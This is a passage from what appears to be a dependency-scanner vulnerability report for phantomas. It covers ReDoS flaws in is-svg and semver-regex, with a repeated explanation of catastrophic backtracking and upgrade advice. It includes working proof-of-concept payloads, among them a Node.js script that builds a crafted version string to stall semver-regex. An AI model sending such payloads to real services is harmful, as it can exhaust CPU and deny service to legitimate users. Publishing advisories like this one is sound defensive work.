  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use the RegEx 101 debugger to see that the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String | Number of C's | Number of steps
ACCCX | 3 | 38
ACCCCX | 4 | 71
ACCCCCX | 5 | 136
ACCCCCCCCCCCCCCX | 14 | 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the engine to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behavior and cause the service to consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade is-svg to version 4.3.0 or higher.

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: semver-regex
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 bin-version-check@4.0.0 bin-version@3.1.0 find-versions@3.2.0 semver-regex@2.0.0

Overview

semver-regex is a package providing a regular expression for matching semver versions.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper usage of regex in the semverRegex() function.

PoC

'0.0.1-' + '-.--'.repeat(i) + ' '
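
A runnable wrapper for that payload might look like the following sketch; the repetition count i is an assumption and may need to be raised before the slowdown becomes obvious:

const semverRegex = require('semver-regex');

const i = 20; // assumed repetition count; increase it if matching still returns quickly
const payload = '0.0.1-' + '-.--'.repeat(i) + ' ';

console.time('semver-regex');
semverRegex().test(payload);
console.timeEnd('semver-regex');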

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use the RegEx 101 debugger to see that the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String | Number of C's | Number of steps
ACCCX | 3 | 38
ACCCCX | 4 | 71
ACCCCCX | 5 | 136
ACCCCCCCCCCCCCCX | 14 | 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the engine to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behavior and cause the service to consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade semver-regex to version 3.1.4, 4.0.3 or higher.

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: semver-regex
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 bin-version-check@4.0.0 bin-version@3.1.0 find-versions@3.2.0 semver-regex@2.0.0

Overview

semver-regex is a package providing a regular expression for matching semver versions.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS).

PoC

// import of the vulnerable library
const semverRegex = require('semver-regex');
// import of measurement tools
const { PerformanceObserver, performance } = require('perf_hooks');

// config of measurement tools
const obs = new PerformanceObserver((items) => {
  console.log(items.getEntries()[0].duration);
  performance.clearMarks();
});
obs.observe({ entryTypes: ['measure'] });

// base version string
let version = 'v1.1.3-0a';

// Adding the evil part, resulting in the string
// v1.1.3-0aa.aa.aa.aa.aa.aa.a…a.a
for (let i = 0; i < 20; i++) {
  version += 'a.a';
}

// Produce a good version that the regex parses in milliseconds.
const goodVersion = version + '2';

// good version proof
performance.mark('good before');
const goodresult = semverRegex().test(goodVersion);
performance.mark('good after');

console.log(`Good result: ${goodresult}`);
performance.measure('Good', 'good before', 'good after');

// Create a bad/exploit version that is invalid due to the trailing $ sign.
// This will cause the Node.js engine to hang; if it does not, increase the
// number of "a.a" additions above.
const badVersion = version + 'aaaaaaa$';

// exploit proof
performance.mark('bad before');
const badresult = semverRegex().test(badVersion);
performance.mark('bad after');

console.log(`Bad result: ${badresult}`);
performance.measure('Bad', 'bad before', 'bad after');

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use the RegEx 101 debugger to see that the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String | Number of C's | Number of steps
ACCCX | 3 | 38
ACCCCX | 4 | 71
ACCCCCX | 5 | 136
ACCCCCCCCCCCCCCX | 14 | 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the engine to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behavior and cause the service to consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade semver-regex to version 3.1.2 or higher.
